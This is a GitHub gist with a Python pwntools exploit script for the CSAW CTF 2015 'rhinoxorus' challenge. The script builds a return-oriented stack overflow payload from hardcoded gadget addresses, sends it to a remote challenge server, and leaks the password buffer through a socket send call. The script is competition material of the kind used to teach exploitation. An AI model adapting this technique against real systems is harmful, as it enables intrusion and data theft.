Skip to content

Instantly share code, notes, and snippets.

@rekkusu

rekkusu/rhinoxorus.py

Created September 20, 2015 23:02
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rekkusu/781c07feb5dd79f91334 to your computer and use it in GitHub Desktop.
Save rekkusu/781c07feb5dd79f91334 to your computer and use it in GitHub Desktop.
Download ZIP
[CSAW CTF 2015] Exploit 500 rhinoxorus
Raw
rhinoxorus.py
from pwn import *
ret_addr = 0x8056afa
pop2ret = 0x80578fa
leaveret = 0x804889f
password = 0x805f0c0
sock_send = 0x804884b
s = remote('54.152.37.20', 24242)
payload = [
p32(0xe1),
p32(0),
p32(0),
p32(0),
p32(0),
p32(0x180), # ebp
p32(ret_addr ^ leaveret),
p32(0),
p32(6 ^ 0xa4), # length == 1
p32(0),
p32(0) * 10,
p32(0) * 16,
p32(sock_send),
p32(0),
p32(4),
p32(password),
p32(0x40),
]
payload_len = sum(map(lambda x: len(x), payload))
print hex(payload_len)
payload = ''.join(payload)
s.send(payload)
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment